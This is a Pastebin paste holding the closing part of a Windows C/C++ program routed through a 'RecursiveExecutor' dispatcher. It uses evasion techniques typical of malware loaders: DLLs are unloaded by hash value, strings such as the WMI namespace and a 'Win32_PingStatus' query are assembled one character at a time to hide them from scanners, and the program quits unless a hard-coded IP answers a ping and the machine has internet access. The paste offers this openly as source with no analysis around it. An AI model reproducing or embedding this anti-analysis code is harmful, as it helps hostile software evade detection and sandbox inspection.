  1952.             Table->Entry->Blink = NULL;
  1953.  
  1954.             break;
  1955.         }
  1956.  
  1957.         case RemoveComData:
  1958.         {
  1959.             Table->dwGeneralUsage1 = 0x52d488c9;
  1960.             RecursiveExecutor(UnloadDll, Table);
  1961.  
  1962.             Table->dwGeneralUsage1 = 0xb8c65c5e;
  1963.             RecursiveExecutor(UnloadDll, Table);
  1964.  
  1965.             Table->ComHelper.ComFunction.CoCreateInstance = NULL;
  1966.             Table->ComHelper.ComFunction.CoInitializeEx = NULL;
  1967.             Table->ComHelper.ComFunction.CoUninitialize = NULL;
  1968.             Table->ComHelper.ComFunction.SysFreeString = NULL;
  1969.             Table->ComHelper.ComFunction.CoInitializeSecurity = NULL;
  1970.  
  1971.             break;
  1972.         }
  1973.  
  1974.         case CheckRemoteHost:
  1975.         {
  1976.             WCHAR RootBuffer[12]; BSTR Root;
  1977.             WCHAR WqlBuffer[5]; BSTR Wql;
  1978.             WCHAR QueryBuffer[62]; BSTR Query;
  1979.             WCHAR GetPropertyBuffer[12]; BSTR GetProperty;
  1980.             VARIANT PingStatus; ((&PingStatus)->vt) = VT_EMPTY;
  1981.  
  1982.             Table->ZeroFill.Destination = &RootBuffer;
  1983.             Table->ZeroFill.Size = sizeof(RootBuffer);
  1984.             RecursiveExecutor(ZeroFillData, Table);
  1985.  
  1986.             Table->ZeroFill.Destination = &WqlBuffer;
  1987.             Table->ZeroFill.Size = sizeof(WqlBuffer);
  1988.             RecursiveExecutor(ZeroFillData, Table);
  1989.  
  1990.             Table->ZeroFill.Destination = &QueryBuffer;
  1991.             Table->ZeroFill.Size = sizeof(QueryBuffer);
  1992.             RecursiveExecutor(ZeroFillData, Table);
  1993.  
  1994.             Table->ZeroFill.Destination = &GetPropertyBuffer;
  1995.             Table->ZeroFill.Size = sizeof(GetPropertyBuffer);
  1996.             RecursiveExecutor(ZeroFillData, Table);
  1997.  
  1998.             Table->ComHelper.ComResult = Table->ComHelper.ComFunction.CoCreateInstance(CLSID_WbemAdministrativeLocator, NULL, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (PVOID*)&Table->ComHelper.ComVariables.Locator);
  1999.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  2000.                 RecursiveExecutor(ExitApplication, Table);
  2001.  
  2002.             Table->dwGeneralUsage1 = 0;
  2003.             RootBuffer[Table->dwGeneralUsage1++] = 'r';
  2004.             RootBuffer[Table->dwGeneralUsage1++] = 'o';
  2005.             RootBuffer[Table->dwGeneralUsage1++] = 'o';
  2006.             RootBuffer[Table->dwGeneralUsage1++] = 't';
  2007.             RootBuffer[Table->dwGeneralUsage1++] = '\\';
  2008.             RootBuffer[Table->dwGeneralUsage1++] = 'c';
  2009.             RootBuffer[Table->dwGeneralUsage1++] = 'i';
  2010.             RootBuffer[Table->dwGeneralUsage1++] = 'm';
  2011.             RootBuffer[Table->dwGeneralUsage1++] = 'v';
  2012.             RootBuffer[Table->dwGeneralUsage1++] = '2';
  2013.             RootBuffer[Table->dwGeneralUsage1++] = '\0';
  2014.             Root = RootBuffer;
  2015.  
  2016.             Table->ComHelper.ComResult = Table->ComHelper.ComVariables.Locator->ConnectServer(Root, NULL, NULL, NULL, WBEM_FLAG_CONNECT_USE_MAX_WAIT, NULL, NULL, &Table->ComHelper.ComVariables.Services);
  2017.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  2018.                 RecursiveExecutor(ExitApplication, Table);
  2019.  
  2020.             Table->dwGeneralUsage1 = 0;
  2021.             WqlBuffer[Table->dwGeneralUsage1++] = 'W';
  2022.             WqlBuffer[Table->dwGeneralUsage1++] = 'Q';
  2023.             WqlBuffer[Table->dwGeneralUsage1++] = 'L';
  2024.             WqlBuffer[Table->dwGeneralUsage1++] = '\0';
  2025.             Wql = WqlBuffer;
  2026.  
  2027.             Table->dwGeneralUsage1 = 0;
  2028.             QueryBuffer[Table->dwGeneralUsage1++] = 'S'; QueryBuffer[Table->dwGeneralUsage1++] = 'E';
  2029.             QueryBuffer[Table->dwGeneralUsage1++] = 'L'; QueryBuffer[Table->dwGeneralUsage1++] = 'E';
  2030.             QueryBuffer[Table->dwGeneralUsage1++] = 'C'; QueryBuffer[Table->dwGeneralUsage1++] = 'T';
  2031.             QueryBuffer[Table->dwGeneralUsage1++] = ' '; QueryBuffer[Table->dwGeneralUsage1++] = '*';
  2032.             QueryBuffer[Table->dwGeneralUsage1++] = ' '; QueryBuffer[Table->dwGeneralUsage1++] = 'F';
  2033.             QueryBuffer[Table->dwGeneralUsage1++] = 'R'; QueryBuffer[Table->dwGeneralUsage1++] = 'O';
  2034.             QueryBuffer[Table->dwGeneralUsage1++] = 'M'; QueryBuffer[Table->dwGeneralUsage1++] = ' ';
  2035.             QueryBuffer[Table->dwGeneralUsage1++] = 'W'; QueryBuffer[Table->dwGeneralUsage1++] = 'i';
  2036.             QueryBuffer[Table->dwGeneralUsage1++] = 'n'; QueryBuffer[Table->dwGeneralUsage1++] = '3';
  2037.             QueryBuffer[Table->dwGeneralUsage1++] = '2'; QueryBuffer[Table->dwGeneralUsage1++] = '_';
  2038.             QueryBuffer[Table->dwGeneralUsage1++] = 'P'; QueryBuffer[Table->dwGeneralUsage1++] = 'i';
  2039.             QueryBuffer[Table->dwGeneralUsage1++] = 'n'; QueryBuffer[Table->dwGeneralUsage1++] = 'g';
  2040.             QueryBuffer[Table->dwGeneralUsage1++] = 'S'; QueryBuffer[Table->dwGeneralUsage1++] = 't';
  2041.             QueryBuffer[Table->dwGeneralUsage1++] = 'a'; QueryBuffer[Table->dwGeneralUsage1++] = 't';
  2042.             QueryBuffer[Table->dwGeneralUsage1++] = 'u'; QueryBuffer[Table->dwGeneralUsage1++] = 's';
  2043.             QueryBuffer[Table->dwGeneralUsage1++] = ' '; QueryBuffer[Table->dwGeneralUsage1++] = 'W';
  2044.             QueryBuffer[Table->dwGeneralUsage1++] = 'H'; QueryBuffer[Table->dwGeneralUsage1++] = 'E';
  2045.             QueryBuffer[Table->dwGeneralUsage1++] = 'R'; QueryBuffer[Table->dwGeneralUsage1++] = 'E';
  2046.             QueryBuffer[Table->dwGeneralUsage1++] = ' '; QueryBuffer[Table->dwGeneralUsage1++] = 'A';
  2047.             QueryBuffer[Table->dwGeneralUsage1++] = 'd'; QueryBuffer[Table->dwGeneralUsage1++] = 'd';
  2048.             QueryBuffer[Table->dwGeneralUsage1++] = 'r'; QueryBuffer[Table->dwGeneralUsage1++] = 'e';
  2049.             QueryBuffer[Table->dwGeneralUsage1++] = 's'; QueryBuffer[Table->dwGeneralUsage1++] = 's';
  2050.             QueryBuffer[Table->dwGeneralUsage1++] = '='; QueryBuffer[Table->dwGeneralUsage1++] = '"';
  2051.             QueryBuffer[Table->dwGeneralUsage1++] = '1'; QueryBuffer[Table->dwGeneralUsage1++] = '7';
  2052.             QueryBuffer[Table->dwGeneralUsage1++] = '2'; QueryBuffer[Table->dwGeneralUsage1++] = '.';
  2053.             QueryBuffer[Table->dwGeneralUsage1++] = '6'; QueryBuffer[Table->dwGeneralUsage1++] = '7';
  2054.             QueryBuffer[Table->dwGeneralUsage1++] = '.'; QueryBuffer[Table->dwGeneralUsage1++] = '1';
  2055.             QueryBuffer[Table->dwGeneralUsage1++] = '3'; QueryBuffer[Table->dwGeneralUsage1++] = '6';
  2056.             QueryBuffer[Table->dwGeneralUsage1++] = '.'; QueryBuffer[Table->dwGeneralUsage1++] = '1';
  2057.             QueryBuffer[Table->dwGeneralUsage1++] = '3'; QueryBuffer[Table->dwGeneralUsage1++] = '6';
  2058.             QueryBuffer[Table->dwGeneralUsage1++] = '"'; QueryBuffer[Table->dwGeneralUsage1++] = '\0';
  2059.             Query = QueryBuffer;
  2060.  
  2061.             Table->ComHelper.ComResult = Table->ComHelper.ComVariables.Services->ExecQuery(Wql, Query, WBEM_FLAG_FORWARD_ONLY, NULL, &Table->ComHelper.ComVariables.Enum);
  2062.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  2063.                 RecursiveExecutor(ExitApplication, Table);
  2064.  
  2065.             Table->dwGeneralUsage1 = 0;
  2066.             Table->ComHelper.ComResult = Table->ComHelper.ComVariables.Enum->Next(WBEM_INFINITE, 1L, &Table->ComHelper.ComVariables.Ping, &Table->dwGeneralUsage1);
  2067.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  2068.                 RecursiveExecutor(ExitApplication, Table);
  2069.  
  2070.             if (Table->dwGeneralUsage1 == 0)
  2071.                 RecursiveExecutor(ExitApplication, Table);
  2072.  
  2073.             Table->dwGeneralUsage1 = 0;
  2074.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 'S';
  2075.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 't';
  2076.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 'a';
  2077.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 't';
  2078.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 'u';
  2079.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 's';
  2080.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 'C';
  2081.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 'o';
  2082.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 'd';
  2083.             GetPropertyBuffer[Table->dwGeneralUsage1++] = 'e';
  2084.             GetPropertyBuffer[Table->dwGeneralUsage1++] = '\0';
  2085.             GetProperty = GetPropertyBuffer;
  2086.  
  2087.             Table->ComHelper.ComResult = Table->ComHelper.ComVariables.Ping->Get(GetProperty, 0, &PingStatus, NULL, NULL);
  2088.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  2089.                 RecursiveExecutor(ExitApplication, Table);
  2090.  
  2091.             if (PingStatus.iVal != ERROR_SUCCESS)
  2092.                 RecursiveExecutor(ExitApplication, Table);
  2093.  
  2094.             if (Table->ComHelper.ComVariables.Locator)
  2095.                 Table->ComHelper.ComVariables.Locator->Release();
  2096.  
  2097.             if (Table->ComHelper.ComVariables.Enum)
  2098.                 Table->ComHelper.ComVariables.Enum->Release();
  2099.  
  2100.             if (Table->ComHelper.ComVariables.Ping)
  2101.                 Table->ComHelper.ComVariables.Ping->Release();
  2102.  
  2103.             if (Table->ComHelper.ComVariables.Services)
  2104.                 Table->ComHelper.ComVariables.Services->Release();
  2105.  
  2106.             Table->ComHelper.ComResult = S_OK;
  2107.  
  2108.             break;
  2109.         }
  2110.  
  2111.         case SafelyExitCom:
  2112.         {
  2113.             if (Table->ComHelper.IsComInitialized)
  2114.                 RecursiveExecutor(ExitApplication, Table);
  2115.  
  2116.             if (Table->ComHelper.ComVariables.Locator)
  2117.                 Table->ComHelper.ComVariables.Locator->Release();
  2118.  
  2119.             if (Table->ComHelper.ComVariables.Enum)
  2120.                 Table->ComHelper.ComVariables.Enum->Release();
  2121.  
  2122.             if (Table->ComHelper.ComVariables.Ping)
  2123.                 Table->ComHelper.ComVariables.Ping->Release();
  2124.  
  2125.             if (Table->ComHelper.ComVariables.Services)
  2126.                 Table->ComHelper.ComVariables.Services->Release();
  2127.  
  2128.             if (Table->ComHelper.ComVariables.NetworkManager)
  2129.                 Table->ComHelper.ComVariables.NetworkManager->Release();
  2130.  
  2131.             if (Table->ComHelper.ComVariables.HttpRequest)
  2132.                 Table->ComHelper.ComVariables.HttpRequest->Release();
  2133.  
  2134.             if(Table->ComHelper.ComVariables.ResponseData)
  2135.                 Table->ComHelper.ComFunction.SysFreeString(Table->ComHelper.ComVariables.ResponseData);
  2136.  
  2137.             RecursiveExecutor(RemoveComData, Table);
  2138.  
  2139.             break;
  2140.         }
  2141.  
  2142.         case CheckLocalMachinesInternetStatus:
  2143.         {
  2144.             VARIANT_BOOL Connected = VARIANT_FALSE;
  2145.  
  2146.             Table->ComHelper.ComResult = Table->ComHelper.ComFunction.CoCreateInstance(CLSID_NetworkListManager, NULL, CLSCTX_ALL, __uuidof(INetworkListManager), (LPVOID*)&Table->ComHelper.ComVariables.NetworkManager);
  2147.             if (!SUCCEEDED(Table->ComHelper.ComResult))
  2148.                 RecursiveExecutor(ExitApplication, Table);
  2149.  
  2150.             Table->ComHelper.ComVariables.NetworkManager->get_IsConnectedToInternet(&Connected);
  2151.             if (Connected == VARIANT_FALSE)
  2152.                 RecursiveExecutor(ExitApplication, Table);
  2153.  
  2154.             Table->ComHelper.ComResult = S_OK;
  2155.  
  2156.             if (Table->ComHelper.ComVariables.NetworkManager)
  2157.                 Table->ComHelper.ComVariables.NetworkManager->Release();
  2158.  
  2159.             break;
  2160.         }
  2161.  
  2162.         case ZeroFillData:
  2163.         {
  2164.             PCHAR q = (PCHAR)Table->ZeroFill.Destination;
  2165.             PCHAR End = q + Table->ZeroFill.Size;
  2166.  
  2167.             for (;;) {
  2168.                 if (q >= End) break; *q++ = 0;
  2169.                 if (q >= End) break; *q++ = 0;
  2170.                 if (q >= End) break; *q++ = 0;
  2171.                 if (q >= End) break; *q++ = 0;
  2172.             }
  2173.  
  2174.             break;
  2175.         }
  2176.  
  2177.         case Win32FromHResult:
  2178.         {
  2179.             if ((Table->ComHelper.ComResult & 0xFFFF0000) == MAKE_HRESULT(SEVERITY_ERROR, FACILITY_WIN32, 0))
  2180.                 Table->dwError = HRESULT_CODE(Table->ComHelper.ComResult);
  2181.  
  2182.             break;
  2183.         }
  2184.  
  2185.         default:
  2186.             break;
  2187.     }
  2188.  
  2189.     return (LPVOID)Table->dwError;
  2190. }
  2191.  
  2192.  
  2193.  
  2194. #pragma warning(push)
  2195. #pragma warning(disable: 6262)
  2196.  
  2197. INT ApplicationEntryPoint(VOID)
  2198. {
  2199.     VARIABLE_TABLE Table;
  2200.     Table.dwError = 0; Table.Status = 0;
  2201.     return (INT)(DWORD64)RecursiveExecutor(EntryPoint, &Table);
  2202. }
  2203. #pragma warning(pop)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!